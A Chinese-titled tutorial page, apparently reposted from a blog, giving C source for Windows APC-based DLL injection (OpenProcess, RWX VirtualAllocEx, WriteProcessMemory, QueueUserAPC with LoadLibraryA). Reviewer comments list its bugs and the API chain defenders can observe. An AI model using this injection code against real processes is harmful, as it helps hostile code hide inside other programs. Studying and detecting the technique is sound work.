
APC注入

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

/*
 * Look up a process id by executable name.
 *
 * Takes a snapshot of all processes, walks it with Process32First/Next and
 * returns th32ProcessID of the first entry whose szExeFile matches
 * pszProcessName case-insensitively.
 *
 * NOTE(review): the function falls off the end without a return when no
 * process matches, so the caller receives an indeterminate DWORD (undefined
 * behaviour in C). The snapshot handle hSnap is never closed on either
 * path and is not checked against INVALID_HANDLE_VALUE before use.
 * strcmpi is a compiler-specific name (not ISO C) and no <string.h> is
 * included on this page.
 */
DWORD GetProcessIdByName(char *pszProcessName) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
/* dwSize must be set before Process32First; done via the first initializer. */
PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)};
BOOL bRet = Process32First(hSnap, &ProcesEntry);
while (bRet) {
if (strcmpi(ProcesEntry.szExeFile, pszProcessName) == 0) {
/* First match wins; returns without closing hSnap. */
return ProcesEntry.th32ProcessID;
}
bRet = Process32Next(hSnap, &ProcesEntry);
}
/* No match: no return statement here (see note above). */
}

/*
 * Collect the ids of every thread owned by ProcessId.
 *
 * Takes a system-wide thread snapshot and copies th32ThreadID of each entry
 * whose th32OwnerProcessID equals ProcessId into a heap array. The array is
 * handed back through *ppThreadId and its element count through
 * *LengthThread; the caller owns the array and is expected to free it
 * (nothing on this page does).
 *
 * NOTE(review): declared BOOL but never returns a value (undefined
 * behaviour if the caller reads it). The array is a fixed 1024-element
 * malloc with no bound check on count, so a target with more than 1024
 * threads writes past the allocation. malloc's result is not checked, and
 * <stdlib.h> is not included on this page, so malloc is implicitly
 * declared. The snapshot handle is never closed.
 */
BOOL GetAllThreadId(DWORD ProcessId,DWORD **ppThreadId,DWORD *LengthThread){
HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 ThreadEntry={sizeof(ThreadEntry)};
BOOL bRet=Thread32First(hSnap, &ThreadEntry);
/* Fixed capacity of 1024 ids; count below is never compared against it. */
DWORD *pThreadId =malloc(sizeof(DWORD)*1024);
int count=0;
while(bRet){
if(ThreadEntry.th32OwnerProcessID==ProcessId){
pThreadId[count]=ThreadEntry.th32ThreadID;
count++;
}
bRet=Thread32Next(hSnap, &ThreadEntry);
}
/* Output parameters; ownership of pThreadId passes to the caller. */
*ppThreadId=pThreadId;
*LengthThread=count;
/* Missing return (see note above). */
}

/*
 * Queue a LoadLibraryA APC on every thread of the named process.
 *
 * Sequence: resolve the process id by name, enumerate its threads, open the
 * process with PROCESS_ALL_ACCESS, allocate an RWX region in it sized to the
 * DLL path string, write the path there, resolve LoadLibraryA from the local
 * kernel32, then open each thread with THREAD_ALL_ACCESS and queue the APC.
 * From a defender's view this is the observable chain: cross-process
 * OpenProcess + RWX VirtualAllocEx + WriteProcessMemory + repeated
 * OpenThread/QueueUserAPC from one source process.
 *
 * NOTE(review): declared BOOL but never returns a value. No return value
 * is checked — GetProcessIdByName may have returned garbage (it has no
 * return on the no-match path), OpenProcess/VirtualAllocEx/OpenThread may
 * return NULL and are used anyway. hProcess and every hThread are leaked,
 * as is the pThreadId array from GetAllThreadId. The loop index i is a
 * signed int compared against the unsigned DWORD LengthThread.
 * The LoadLibraryA address obtained in this process is reused in the
 * remote one; that presumably relies on kernel32 being mapped at the same
 * base in both — confirm, it is not guaranteed by anything on this page.
 */
BOOL DllInject(char *pszProcessName,char *pszDllName){
DWORD ProcessId=GetProcessIdByName(pszProcessName);
DWORD *pThreadId=NULL;
DWORD LengthThread=0;
GetAllThreadId(ProcessId, &pThreadId, &LengthThread);
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
/* Remote buffer holds only the NUL-terminated path string. */
LPVOID lDllAdr=VirtualAllocEx(hProcess, NULL, strlen(pszDllName)+1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lDllAdr, pszDllName, strlen(pszDllName)+1, 0);
/* Local address of LoadLibraryA, passed to the remote process as the APC routine. */
FARPROC pLoadLibraryA=GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
HANDLE hThread;
for(int i=0;i<LengthThread;i++){
/* Each handle is overwritten on the next iteration and never closed. */
hThread=OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);
QueueUserAPC((PAPCFUNC)pLoadLibraryA, hThread,(ULONG_PTR) lDllAdr);
}
/* Missing return; pThreadId and hProcess are not released. */
}

/*
 * Entry point: runs DllInject with a hard-coded target executable name and
 * a hard-coded absolute DLL path, then exits 0 regardless of outcome
 * (DllInject reports nothing, so there is no outcome to check).
 */
int main(){
DllInject("code.exe", "C:\\Users\\beini\\Desktop\\work\\test.dll");
return 0;
}

APC注入

原文:https://www.cnblogs.com/far-ring3/p/10928238.html
